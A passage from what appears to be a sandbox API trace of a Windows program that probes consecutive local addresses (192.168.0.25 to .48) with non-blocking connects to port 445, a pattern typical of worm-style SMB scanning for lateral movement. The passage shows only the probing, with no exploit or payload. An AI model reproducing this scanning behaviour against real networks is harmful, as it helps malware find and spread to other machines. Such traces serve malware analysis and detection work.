argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0145.715] connect (s=0x438, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.25"), namelen=16) returned -1 [0145.715] ioctlsocket (in: s=0x438, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0145.715] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0146.756] __WSAFDIsSet (param_1=0x438, param_2=0x36ef368) returned 0 [0146.756] GetLastError () returned 0x0 [0146.756] SetLastError (dwErrCode=0x0) [0146.756] GetLastError () returned 0x0 [0146.756] SetLastError (dwErrCode=0x0) [0146.756] htonl (hostlong=0xc0a8001a) returned 0x1a00a8c0 [0146.756] inet_ntoa (in=0x1a00a8c0) returned="192.168.0.26" [0146.756] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0146.756] socket (af=2, type=1, protocol=6) returned 0x458 [0146.756] inet_addr (cp="192.168.0.26") returned 0x1a00a8c0 [0146.756] htons (hostshort=0x1bd) returned 0xbd01 [0146.756] ioctlsocket (in: s=0x458, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0146.756] connect (s=0x458, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.26"), namelen=16) returned -1 [0146.756] ioctlsocket (in: s=0x458, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0146.756] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0147.758] __WSAFDIsSet (param_1=0x458, param_2=0x36ef368) returned 0 [0147.758] GetLastError () returned 0x0 [0147.758] SetLastError (dwErrCode=0x0) [0147.758] GetLastError () returned 0x0 [0147.758] SetLastError (dwErrCode=0x0) [0147.758] htonl (hostlong=0xc0a8001b) returned 0x1b00a8c0 [0147.758] inet_ntoa (in=0x1b00a8c0) returned="192.168.0.27" [0147.758] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0147.758] socket (af=2, type=1, protocol=6) returned 0x460 [0147.759] inet_addr (cp="192.168.0.27") returned 0x1b00a8c0 [0147.759] htons (hostshort=0x1bd) returned 0xbd01 [0147.759] ioctlsocket (in: s=0x460, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0147.759] connect (s=0x460, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.27"), namelen=16) returned -1 [0147.759] ioctlsocket (in: s=0x460, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0147.759] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0148.773] __WSAFDIsSet (param_1=0x460, param_2=0x36ef368) returned 0 [0148.773] GetLastError () returned 0x0 [0148.773] SetLastError (dwErrCode=0x0) [0148.773] GetLastError () returned 0x0 [0148.773] SetLastError (dwErrCode=0x0) [0148.773] htonl (hostlong=0xc0a8001c) returned 0x1c00a8c0 [0148.773] inet_ntoa (in=0x1c00a8c0) returned="192.168.0.28" [0148.773] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0148.773] socket (af=2, type=1, protocol=6) returned 0x130 [0148.773] inet_addr (cp="192.168.0.28") returned 0x1c00a8c0 [0148.774] htons (hostshort=0x1bd) returned 0xbd01 [0148.774] ioctlsocket (in: s=0x130, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0148.774] connect (s=0x130, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.28"), namelen=16) returned -1 [0148.774] ioctlsocket (in: s=0x130, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0148.774] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0149.786] __WSAFDIsSet (param_1=0x130, param_2=0x36ef368) returned 0 [0149.786] GetLastError () returned 0x0 [0149.786] SetLastError (dwErrCode=0x0) [0149.786] GetLastError () returned 0x0 [0149.786] SetLastError (dwErrCode=0x0) [0149.786] htonl (hostlong=0xc0a8001d) returned 0x1d00a8c0 [0149.786] inet_ntoa (in=0x1d00a8c0) returned="192.168.0.29" [0149.786] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0149.786] socket (af=2, type=1, protocol=6) returned 0x254 [0149.786] inet_addr (cp="192.168.0.29") returned 0x1d00a8c0 [0149.786] htons (hostshort=0x1bd) returned 0xbd01 [0149.786] ioctlsocket (in: s=0x254, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0149.787] connect (s=0x254, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.29"), namelen=16) returned -1 [0149.787] ioctlsocket (in: s=0x254, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0149.787] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0150.801] __WSAFDIsSet (param_1=0x254, param_2=0x36ef368) returned 0 [0150.801] GetLastError () returned 0x0 [0150.801] SetLastError (dwErrCode=0x0) [0150.801] GetLastError () returned 0x0 [0150.801] SetLastError (dwErrCode=0x0) [0150.801] htonl (hostlong=0xc0a8001e) returned 0x1e00a8c0 [0150.801] inet_ntoa (in=0x1e00a8c0) returned="192.168.0.30" [0150.801] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0150.801] socket (af=2, type=1, protocol=6) returned 0x470 [0150.802] inet_addr (cp="192.168.0.30") returned 0x1e00a8c0 [0150.802] htons (hostshort=0x1bd) returned 0xbd01 [0150.802] ioctlsocket (in: s=0x470, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0150.802] connect (s=0x470, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.30"), namelen=16) returned -1 [0150.802] ioctlsocket (in: s=0x470, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0150.802] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0151.814] __WSAFDIsSet (param_1=0x470, param_2=0x36ef368) returned 0 [0151.814] GetLastError () returned 0x0 [0151.814] SetLastError (dwErrCode=0x0) [0151.814] GetLastError () returned 0x0 [0151.814] SetLastError (dwErrCode=0x0) [0151.814] htonl (hostlong=0xc0a8001f) returned 0x1f00a8c0 [0151.814] inet_ntoa (in=0x1f00a8c0) returned="192.168.0.31" [0151.814] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0151.814] socket (af=2, type=1, protocol=6) returned 0x474 [0151.814] inet_addr (cp="192.168.0.31") returned 0x1f00a8c0 [0151.814] htons (hostshort=0x1bd) returned 0xbd01 [0151.814] ioctlsocket (in: s=0x474, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0151.814] connect (s=0x474, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.31"), namelen=16) returned -1 [0151.815] ioctlsocket (in: s=0x474, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0151.815] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0152.829] __WSAFDIsSet (param_1=0x474, param_2=0x36ef368) returned 0 [0152.829] GetLastError () returned 0x0 [0152.829] SetLastError (dwErrCode=0x0) [0152.829] GetLastError () returned 0x0 [0152.829] SetLastError (dwErrCode=0x0) [0152.829] htonl (hostlong=0xc0a80020) returned 0x2000a8c0 [0152.829] inet_ntoa (in=0x2000a8c0) returned="192.168.0.32" [0152.829] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0152.829] socket (af=2, type=1, protocol=6) returned 0x480 [0152.829] inet_addr (cp="192.168.0.32") returned 0x2000a8c0 [0152.829] htons (hostshort=0x1bd) returned 0xbd01 [0152.829] ioctlsocket (in: s=0x480, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0152.829] connect (s=0x480, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.32"), namelen=16) returned -1 [0152.830] ioctlsocket (in: s=0x480, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0152.830] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0153.842] __WSAFDIsSet (param_1=0x480, param_2=0x36ef368) returned 0 [0153.842] GetLastError () returned 0x0 [0153.842] SetLastError (dwErrCode=0x0) [0153.842] GetLastError () returned 0x0 [0153.842] SetLastError (dwErrCode=0x0) [0153.842] htonl (hostlong=0xc0a80021) returned 0x2100a8c0 [0153.842] inet_ntoa (in=0x2100a8c0) returned="192.168.0.33" [0153.842] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0153.842] socket (af=2, type=1, protocol=6) returned 0x484 [0153.842] inet_addr (cp="192.168.0.33") returned 0x2100a8c0 [0153.842] htons (hostshort=0x1bd) returned 0xbd01 [0153.842] ioctlsocket (in: s=0x484, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0153.843] connect (s=0x484, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.33"), namelen=16) returned -1 [0153.843] ioctlsocket (in: s=0x484, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0153.843] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0154.856] __WSAFDIsSet (param_1=0x484, param_2=0x36ef368) returned 0 [0154.856] GetLastError () returned 0x0 [0154.856] SetLastError (dwErrCode=0x0) [0154.856] GetLastError () returned 0x0 [0154.856] SetLastError (dwErrCode=0x0) [0154.856] htonl (hostlong=0xc0a80022) returned 0x2200a8c0 [0154.856] inet_ntoa (in=0x2200a8c0) returned="192.168.0.34" [0154.856] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0154.856] socket (af=2, type=1, protocol=6) returned 0x40c [0154.856] inet_addr (cp="192.168.0.34") returned 0x2200a8c0 [0154.856] htons (hostshort=0x1bd) returned 0xbd01 [0154.857] ioctlsocket (in: s=0x40c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0154.857] connect (s=0x40c, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.34"), namelen=16) returned -1 [0154.857] ioctlsocket (in: s=0x40c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0154.857] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0155.872] __WSAFDIsSet (param_1=0x40c, param_2=0x36ef368) returned 0 [0155.872] GetLastError () returned 0x0 [0155.872] SetLastError (dwErrCode=0x0) [0155.872] GetLastError () returned 0x0 [0155.872] SetLastError (dwErrCode=0x0) [0155.872] htonl (hostlong=0xc0a80023) returned 0x2300a8c0 [0155.872] inet_ntoa (in=0x2300a8c0) returned="192.168.0.35" [0155.872] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0155.872] socket (af=2, type=1, protocol=6) returned 0x490 [0155.872] inet_addr (cp="192.168.0.35") returned 0x2300a8c0 [0155.872] htons (hostshort=0x1bd) returned 0xbd01 [0155.872] ioctlsocket (in: s=0x490, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0155.872] connect (s=0x490, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.35"), namelen=16) returned -1 [0155.873] ioctlsocket (in: s=0x490, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0155.873] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0156.886] __WSAFDIsSet (param_1=0x490, param_2=0x36ef368) returned 0 [0156.886] GetLastError () returned 0x0 [0156.886] SetLastError (dwErrCode=0x0) [0156.886] GetLastError () returned 0x0 [0156.886] SetLastError (dwErrCode=0x0) [0156.886] htonl (hostlong=0xc0a80024) returned 0x2400a8c0 [0156.887] inet_ntoa (in=0x2400a8c0) returned="192.168.0.36" [0156.887] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0156.887] socket (af=2, type=1, protocol=6) returned 0x42c [0156.887] inet_addr (cp="192.168.0.36") returned 0x2400a8c0 [0156.887] htons (hostshort=0x1bd) returned 0xbd01 [0156.887] ioctlsocket (in: s=0x42c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0156.887] connect (s=0x42c, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.36"), namelen=16) returned -1 [0156.887] ioctlsocket (in: s=0x42c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0156.887] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0157.898] __WSAFDIsSet (param_1=0x42c, param_2=0x36ef368) returned 0 [0157.898] GetLastError () returned 0x0 [0157.898] SetLastError (dwErrCode=0x0) [0157.898] GetLastError () returned 0x0 [0157.898] SetLastError (dwErrCode=0x0) [0157.898] htonl (hostlong=0xc0a80025) returned 0x2500a8c0 [0157.898] inet_ntoa (in=0x2500a8c0) returned="192.168.0.37" [0157.898] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0157.898] socket (af=2, type=1, protocol=6) returned 0x49c [0157.898] inet_addr (cp="192.168.0.37") returned 0x2500a8c0 [0157.898] htons (hostshort=0x1bd) returned 0xbd01 [0157.898] ioctlsocket (in: s=0x49c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0157.899] connect (s=0x49c, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.37"), namelen=16) returned -1 [0157.899] ioctlsocket (in: s=0x49c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0157.899] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0158.914] __WSAFDIsSet (param_1=0x49c, param_2=0x36ef368) returned 0 [0158.914] GetLastError () returned 0x0 [0158.914] SetLastError (dwErrCode=0x0) [0158.914] GetLastError () returned 0x0 [0158.914] SetLastError (dwErrCode=0x0) [0158.914] htonl (hostlong=0xc0a80026) returned 0x2600a8c0 [0158.914] inet_ntoa (in=0x2600a8c0) returned="192.168.0.38" [0158.914] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0158.914] socket (af=2, type=1, protocol=6) returned 0x498 [0158.914] inet_addr (cp="192.168.0.38") returned 0x2600a8c0 [0158.914] htons (hostshort=0x1bd) returned 0xbd01 [0158.914] ioctlsocket (in: s=0x498, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0158.914] connect (s=0x498, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.38"), namelen=16) returned -1 [0158.915] ioctlsocket (in: s=0x498, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0158.915] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0159.926] __WSAFDIsSet (param_1=0x498, param_2=0x36ef368) returned 0 [0159.926] GetLastError () returned 0x0 [0159.926] SetLastError (dwErrCode=0x0) [0159.926] GetLastError () returned 0x0 [0159.926] SetLastError (dwErrCode=0x0) [0159.926] htonl (hostlong=0xc0a80027) returned 0x2700a8c0 [0159.926] inet_ntoa (in=0x2700a8c0) returned="192.168.0.39" [0159.927] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0159.927] socket (af=2, type=1, protocol=6) returned 0x4b0 [0159.927] inet_addr (cp="192.168.0.39") returned 0x2700a8c0 [0159.927] htons (hostshort=0x1bd) returned 0xbd01 [0159.927] ioctlsocket (in: s=0x4b0, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0159.927] connect (s=0x4b0, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.39"), namelen=16) returned -1 [0159.927] ioctlsocket (in: s=0x4b0, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0159.928] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 1 [0159.928] __WSAFDIsSet (param_1=0x4b0, param_2=0x36ef368) returned 1 [0159.928] GetLastError () returned 0x0 [0159.928] SetLastError (dwErrCode=0x0) [0159.928] GetLastError () returned 0x0 [0159.928] SetLastError (dwErrCode=0x0) [0159.928] htonl (hostlong=0xc0a80028) returned 0x2800a8c0 [0159.928] inet_ntoa (in=0x2800a8c0) returned="192.168.0.40" [0159.928] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0159.928] socket (af=2, type=1, protocol=6) returned 0x4b8 [0159.928] inet_addr (cp="192.168.0.40") returned 0x2800a8c0 [0159.928] htons (hostshort=0x1bd) returned 0xbd01 [0159.928] ioctlsocket (in: s=0x4b8, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0159.928] connect (s=0x4b8, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.40"), namelen=16) returned -1 [0159.928] ioctlsocket (in: s=0x4b8, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0159.928] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0160.941] __WSAFDIsSet (param_1=0x4b8, param_2=0x36ef368) returned 0 [0160.941] GetLastError () returned 0x0 [0160.941] SetLastError (dwErrCode=0x0) [0160.941] GetLastError () returned 0x0 [0160.941] SetLastError (dwErrCode=0x0) [0160.941] htonl (hostlong=0xc0a80029) returned 0x2900a8c0 [0160.941] inet_ntoa (in=0x2900a8c0) returned="192.168.0.41" [0160.941] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0160.941] socket (af=2, type=1, protocol=6) returned 0x4d8 [0160.941] inet_addr (cp="192.168.0.41") returned 0x2900a8c0 [0160.941] htons (hostshort=0x1bd) returned 0xbd01 [0160.941] ioctlsocket (in: s=0x4d8, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0160.941] connect (s=0x4d8, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.41"), namelen=16) returned -1 [0160.942] ioctlsocket (in: s=0x4d8, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0160.942] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0161.954] __WSAFDIsSet (param_1=0x4d8, param_2=0x36ef368) returned 0 [0161.954] GetLastError () returned 0x0 [0161.954] SetLastError (dwErrCode=0x0) [0161.954] GetLastError () returned 0x0 [0161.954] SetLastError (dwErrCode=0x0) [0161.954] htonl (hostlong=0xc0a8002a) returned 0x2a00a8c0 [0161.954] inet_ntoa (in=0x2a00a8c0) returned="192.168.0.42" [0161.954] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0161.954] socket (af=2, type=1, protocol=6) returned 0x4d0 [0161.954] inet_addr (cp="192.168.0.42") returned 0x2a00a8c0 [0161.954] htons (hostshort=0x1bd) returned 0xbd01 [0161.954] ioctlsocket (in: s=0x4d0, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0161.954] connect (s=0x4d0, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.42"), namelen=16) returned -1 [0161.955] ioctlsocket (in: s=0x4d0, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0161.955] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0162.969] __WSAFDIsSet (param_1=0x4d0, param_2=0x36ef368) returned 0 [0162.969] GetLastError () returned 0x0 [0162.969] SetLastError (dwErrCode=0x0) [0162.969] GetLastError () returned 0x0 [0162.969] SetLastError (dwErrCode=0x0) [0162.969] htonl (hostlong=0xc0a8002b) returned 0x2b00a8c0 [0162.969] inet_ntoa (in=0x2b00a8c0) returned="192.168.0.43" [0162.969] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0162.969] socket (af=2, type=1, protocol=6) returned 0x4e0 [0162.970] inet_addr (cp="192.168.0.43") returned 0x2b00a8c0 [0162.970] htons (hostshort=0x1bd) returned 0xbd01 [0162.970] ioctlsocket (in: s=0x4e0, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0162.970] connect (s=0x4e0, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.43"), namelen=16) returned -1 [0162.970] ioctlsocket (in: s=0x4e0, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0162.970] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0163.982] __WSAFDIsSet (param_1=0x4e0, param_2=0x36ef368) returned 0 [0163.982] GetLastError () returned 0x0 [0163.982] SetLastError (dwErrCode=0x0) [0163.982] GetLastError () returned 0x0 [0163.982] SetLastError (dwErrCode=0x0) [0163.982] htonl (hostlong=0xc0a8002c) returned 0x2c00a8c0 [0163.982] inet_ntoa (in=0x2c00a8c0) returned="192.168.0.44" [0163.982] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0163.982] socket (af=2, type=1, protocol=6) returned 0x4ec [0163.982] inet_addr (cp="192.168.0.44") returned 0x2c00a8c0 [0163.982] htons (hostshort=0x1bd) returned 0xbd01 [0163.982] ioctlsocket (in: s=0x4ec, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0163.982] connect (s=0x4ec, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.44"), namelen=16) returned -1 [0163.983] ioctlsocket (in: s=0x4ec, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0163.983] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0164.999] __WSAFDIsSet (param_1=0x4ec, param_2=0x36ef368) returned 0 [0165.000] GetLastError () returned 0x0 [0165.000] SetLastError (dwErrCode=0x0) [0165.000] GetLastError () returned 0x0 [0165.000] SetLastError (dwErrCode=0x0) [0165.000] htonl (hostlong=0xc0a8002d) returned 0x2d00a8c0 [0165.000] inet_ntoa (in=0x2d00a8c0) returned="192.168.0.45" [0165.000] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0165.000] socket (af=2, type=1, protocol=6) returned 0x4f8 [0165.000] inet_addr (cp="192.168.0.45") returned 0x2d00a8c0 [0165.000] htons (hostshort=0x1bd) returned 0xbd01 [0165.000] ioctlsocket (in: s=0x4f8, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0165.000] connect (s=0x4f8, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.45"), namelen=16) returned -1 [0165.000] ioctlsocket (in: s=0x4f8, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0165.000] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0166.010] __WSAFDIsSet (param_1=0x4f8, param_2=0x36ef368) returned 0 [0166.010] GetLastError () returned 0x0 [0166.010] SetLastError (dwErrCode=0x0) [0166.010] GetLastError () returned 0x0 [0166.010] SetLastError (dwErrCode=0x0) [0166.010] htonl (hostlong=0xc0a8002e) returned 0x2e00a8c0 [0166.010] inet_ntoa (in=0x2e00a8c0) returned="192.168.0.46" [0166.010] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0166.010] socket (af=2, type=1, protocol=6) returned 0x4fc [0166.010] inet_addr (cp="192.168.0.46") returned 0x2e00a8c0 [0166.010] htons (hostshort=0x1bd) returned 0xbd01 [0166.010] ioctlsocket (in: s=0x4fc, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0166.011] connect (s=0x4fc, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.46"), namelen=16) returned -1 [0166.011] ioctlsocket (in: s=0x4fc, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0166.011] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0167.025] __WSAFDIsSet (param_1=0x4fc, param_2=0x36ef368) returned 0 [0167.025] GetLastError () returned 0x0 [0167.025] SetLastError (dwErrCode=0x0) [0167.025] GetLastError () returned 0x0 [0167.025] SetLastError (dwErrCode=0x0) [0167.025] htonl (hostlong=0xc0a8002f) returned 0x2f00a8c0 [0167.025] inet_ntoa (in=0x2f00a8c0) returned="192.168.0.47" [0167.025] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0167.025] socket (af=2, type=1, protocol=6) returned 0x50c [0167.025] inet_addr (cp="192.168.0.47") returned 0x2f00a8c0 [0167.025] htons (hostshort=0x1bd) returned 0xbd01 [0167.025] ioctlsocket (in: s=0x50c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0167.025] connect (s=0x50c, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.47"), namelen=16) returned -1 [0167.025] ioctlsocket (in: s=0x50c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0167.026] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0168.039] __WSAFDIsSet (param_1=0x50c, param_2=0x36ef368) returned 0 [0168.040] GetLastError () returned 0x0 [0168.040] SetLastError (dwErrCode=0x0) [0168.040] GetLastError () returned 0x0 [0168.040] SetLastError (dwErrCode=0x0) [0168.040] htonl (hostlong=0xc0a80030) returned 0x3000a8c0 [0168.040] inet_ntoa (in=0x3000a8c0) returned="192.168.0.48" [0168.040] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0168.040] socket (af=2, type=1, protocol=6) returned 0x504 [0168.040] inet_addr (cp="192.168.0.48") returned 0x3000a8c0 [0168.040] htons (hostshort=0x1bd) returned 0xbd01 [0168.040] ioctlsocket (in: s=0x504, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0168.040] connect (s=0x504, name=0x36ef358*(sa_family=2, 